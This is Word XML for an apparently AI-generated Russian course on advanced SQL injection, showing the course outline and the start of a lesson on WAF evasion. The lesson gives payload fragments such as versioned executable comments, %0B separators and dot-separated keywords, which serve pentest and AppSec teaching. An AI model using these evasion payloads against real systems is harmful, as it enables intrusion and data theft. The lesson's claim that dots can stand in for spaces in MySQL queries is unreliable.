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560"/>
        <w:jc w:val="left"/>
        <w:shd w:val="clear" w:color="auto" w:fill="0F1B3A"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  SIGMA  ·  AI COURSE GENERATOR  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="B88B2A"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>SQL-ИНЪЕКЦИИ: ПРОДВИНУТЫЙ УРОВЕНЬ</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="112B6B"/>
          <w:sz w:val="64"/>
        </w:rPr>
        <w:t>SQL-инъекции продвинутого уровня: от обхода WAF до эксплуатации Second-Order и Out-of-band атак</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="440"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="5A606A"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Перейдите от автоматизированных сканеров к экспертному ручному анализу и эксплуатации сложных векторов атак</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="C9CDD3"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="5A606A"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>2 модулей  ·  5 уроков  ·  ~38 мин  ·  Русский</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="324" w:lineRule="auto" w:after="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Курс ориентирован на глубокое понимание механизмов внедрения SQL-кода в условиях современной защиты. Вы научитесь обнаруживать скрытые уязвимости второго порядка и обходить системы фильтрации трафика, когда стандартные инструменты бессильны.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="480" w:line="312" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="112B6B"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Уникальность курса:  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Курс полностью исключает использование автоматических инструментов, фокусируясь на развитии навыка ручного анализа и эксплуатации. Уникальность программы заключается в детальном разборе атак второго порядка и методах обхода современных WAF, что редко встречается в базовых программах обучения ИБ.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="5A606A"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Сгенерировано: 28.07.2026, 18:09</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="C9CDD3"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:t>Содержание</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="5A606A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Ctrl + клик на пункте оглавления — переход к разделу. Если оглавление пустое: правый клик → «Обновить поле» (или F9).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
        <w:instrText xml:space="preserve">TOC \o "1-3" \h \z \u</w:instrText>
        <w:fldChar w:fldCharType="separate"/>
        <w:t>Содержание появится здесь после первого открытия в Word (или нажми F9).</w:t>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="C9CDD3"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:t>Паспорт курса</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="5A606A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Краткий смысловой конспект курса — для вас, ваших студентов и всех, кто оценивает программу.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="left"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3118"/>
        <w:gridCol w:w="6690"/>
      </w:tblGrid>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SQL-инъекции продвинутого уровня: от обхода WAF до эксплуатации Second-Order и Out-of-band атак</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Короткое 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SQL-инъекции: Продвинутый уровень</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Таглайн</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Перейдите от автоматизированных сканеров к экспертному ручному анализу и эксплуатации сложных векторов атак</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Описание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Курс ориентирован на глубокое понимание механизмов внедрения SQL-кода в условиях современной защиты. Вы научитесь обнаруживать скрытые уязвимости второго порядка и обходить системы фильтрации трафика, когда стандартные инструменты бессильны.</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Целевая аудитория</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Пентестеры уровня Middle, AppSec-инженеры и Senior Backend-разработчики, стремящиеся к экспертности в области безопасности баз данных</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Требования к студенту</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Уверенное знание синтаксиса SQL (MySQL, PostgreSQL); Понимание основ протокола HTTP и работы веб-приложений; Базовые навыки работы с Burp Suite и командной строкой Linux; Наличие установленного Docker для запуска лабораторных стендов</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модулей</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2</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уроков</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5</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Средняя длительность урока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7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Общая продолжительность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~38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Форматы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Концентрированные текстовые лекции; Практические задания в Docker-контейнерах; Разбор реальных CVE-кейсов; Интерактивные тесты</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Оценка и контроль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Автоматизированная проверка флагов в лабораторных работах; Итоговый технический тест на верификацию векторов атак</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Доп. материалы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Чек-лист по обходу WAF; Шаблоны скриптов для автоматизации Blind SQLi; Гайд по настройке безопасного окружения СУБД</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Сертификат</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Сертификат экспертного уровня, подтверждающий навыки продвинутого тестирования на проникновение в части SQL-инъекций</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УТП курса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Курс полностью исключает использование автоматических инструментов, фокусируясь на развитии навыка ручного анализа и эксплуатации. Уникальность программы заключается в детальном разборе атак второго порядка и методах обхода современных WAF, что редко встречается в базовых программах обучения ИБ.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Цели курса</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Освоить техники ручной эксплуатации Blind и Time-based инъекций без использования sqlmap</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Изучить методы обхода Web Application Firewall через обфускацию и манипуляцию протоколами</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Реализовать сценарии эксфильтрации данных через Out-of-band каналы связи</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Внедрить методологию безопасной разработки для полного предотвращения SQLi на уровне архитектуры</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Навыки после прохождения</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Идентифицировать уязвимости Second-Order SQLi в сложной бизнес-логике</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Конструировать полезные нагрузки для обхода сигнатурного анализа WAF</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Автоматизировать извлечение данных с помощью кастомных скриптов на Python</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Проводить аудит исходного кода на языках PHP и Python для поиска векторов внедрения</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Настраивать DNS и HTTP слушатели для реализации Out-of-band атак</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="C9CDD3"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:t>Учебный план</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="5A606A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Структура курса в виде таблицы: модули, уроки, их содержание, ожидаемые результаты и время изучения.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="left"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1949"/>
        <w:gridCol w:w="1949"/>
        <w:gridCol w:w="1949"/>
        <w:gridCol w:w="1949"/>
        <w:gridCol w:w="1949"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="680"/>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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2665"/>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Модуль / Урок</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="311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Содержание</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="260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Результат</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="737"/>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Мин</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M1</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Обход современных систем защиты и скрытые векторы</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Освоить продвинутые техники манипуляции синтаксисом и выявления латентных уязвимостей в сложной бизнес-логике.</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способен обходить WAF/IPS системы и эксплуатировать инъекции второго порядка без использования автоматизированных средств.</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15</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Манипуляция синтаксисом для обхода WAF и IPS</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Изучение техник обфускации полезной нагрузки через альтернативные кодировки, специфические функции СУБД и HTTP Parameter Pollution для обмана сигнатурного анализа.</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Умение конструировать полезные нагрузки, невидимые для стандартных правил фильтрации трафика.</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Second-Order SQLi: Эксплуатация отложенных уязвимостей</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Разбор механики атак второго порядка, где внедренный код сохраняется в БД и срабатывает при выполнении другого легитимного запроса. Поиск точек входа в профилях и настройках.</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Навык идентификации и эксплуатации SQL-инъекций в многоэтапных процессах обработки данных.</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8</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M2</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Продвинутая эксфильтрация и экспертный аудит</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Изучить методы извлечения данных через внешние каналы и закрепить навыки проектирования безопасных систем.</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владеет техниками Out-of-band атак и методологией экспертного аудита кода для предотвращения SQLi.</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23</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Продвинутые инъекции: Сложные сценарии и автоматизация</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Глубокое погружение в нестандартные сценарии эксплуатации, включая многоуровневое вложение запросов и написание кастомных Python-скриптов для автоматизации ручного поиска.</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Способность автоматизировать сложные векторы атак и находить уязвимости в нестандартных конфигурациях СУБД.</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9</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Out-of-band (OOB) атаки через DNS и HTTP</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Техника извлечения данных через внешние запросы СУБД в условиях, когда классические Blind-методы неэффективны. Настройка слушателей и работа с протоколами.</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Навык настройки инфраструктуры для эксфильтрации данных через сторонние каналы связи.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2.3</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Безопасная архитектура и экспертный аудит кода</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Разбор паттернов уязвимого кода на PHP и Python. Проектирование защиты на уровне СУБД и переход к стратегии эшелонированной обороны (Defense in Depth).</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Умение проводить профессиональный аудит кода и внедрять механизмы защиты, исключающие SQLi на уровне архитектуры.</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7</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="C9CDD3"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:t>Содержание курса</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="5A606A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Развёрнутое содержание уроков. Теория, практика, примеры, домашние задания и чек-листы ключевых идей.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="11295C"/>
        <w:spacing w:before="80" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">  МОДУЛЬ 1  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Обход современных систем защиты и скрытые векторы</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Освоить продвинутые техники манипуляции синтаксисом и выявления латентных уязвимостей в сложной бизнес-логике.</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способен обходить WAF/IPS системы и эксплуатировать инъекции второго порядка без использования автоматизированных средств.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="C9CDD3"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="360" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Урок 1.1 — Манипуляция синтаксисом для обхода WAF и IPS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="5A606A"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>~7 мин · теория · практика</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="360" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="112B6B"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>Искусство мимикрии: обход WAF через синтаксические аномалии</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:lineRule="auto" w:line="312"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Представьте себе современный Web Application Firewall (WAF) как элитного вышибалу в закрытом клубе. У него есть четкий список нежелательных лиц — «черный список» сигнатур, таких как </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>UNION SELECT</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OR 1=1</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information_schema</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>. Если вы попытаетесь войти в парадную дверь с этими фразами на футболке, вас мгновенно заблокируют. Однако этот вышибала — не человек, а алгоритм, который мыслит строго в рамках заложенных в него паттернов. Если вы переоденетесь так, что станете неузнаваемы для его правил, но при этом останетесь собой для «охраны внутри» (самой базы данных), доступ будет открыт. Проблема большинства пентестеров уровня Middle заключается в избыточном доверии к автоматизированным инструментам вроде sqlmap, чьи стандартные тамперы давно известны производителям средств защиты.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:lineRule="auto" w:line="312"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Настоящее мастерство эксплуатации SQL-инъекций начинается там, где заканчиваются стандартные векторы. В условиях глубоко эшелонированной обороны ваша задача — не просто найти уязвимость, а доставить полезную нагрузку через «узкое горлышко» инспектора трафика. Для этого необходимо использовать фундаментальные различия в том, как парсит строку WAF и как это делает конкретный SQL-движок (MySQL, PostgreSQL или MSSQL). Мы будем использовать неоднозначности синтаксиса, особенности обработки кодировок и логические лазейки в протоколе HTTP, чтобы превратить очевидную атаку в легитимный, на первый взгляд, шум.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:before="280" w:after="80"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="C9CDD3"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="112B6B"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Анатомия обмана: комментарии, пробелы и невидимые символы</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:lineRule="auto" w:line="312"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Первая линия обороны WAF — это поиск пробельных символов и ключевых слов в связке. Большинство сигнатур настроены на поиск паттерна </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>SELECT &lt;space&gt; FROM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Но что, если мы скажем базе данных то же самое, не используя ни одного пробела? В MySQL для этого идеально подходят многострочные комментарии в стиле Си </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>/**/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, но современные IPS легко их детектируют. Более продвинутый метод — использование специфического синтаксиса </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>/*!50000SELECT*/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>. Это «исполняемый комментарий», который MySQL интерпретирует как код, если версия сервера выше или равна 5.00.00, в то время как WAF может видеть в этом просто безобидный блок комментариев.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:lineRule="auto" w:line="312"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Однако настоящая магия начинается при манипуляции непечатными символами. Различные СУБД позволяют использовать в качестве разделителей токены, которые WAF просто игнорирует или считает частью строкового литерала. Например, в PostgreSQL и MSSQL можно использовать символы новой строки, табуляции или даже вертикальной табуляции (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>%0B</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) между ключевыми словами. В некоторых конфигурациях MySQL символ точки или обратного апострофа может служить разделителем, который ломает регулярное выражение фильтра: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>SELECT.column_name.FROM.table_name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1B1F24"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>. Если фильтр ожидает пробел, такая конструкция пройдет сквозь него, а парсер базы данных успешно выполнит запрос, отбросив лишние точки как элементы именования схем.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:lineRule="auto" w:line="312"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri" w:eastAsia="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
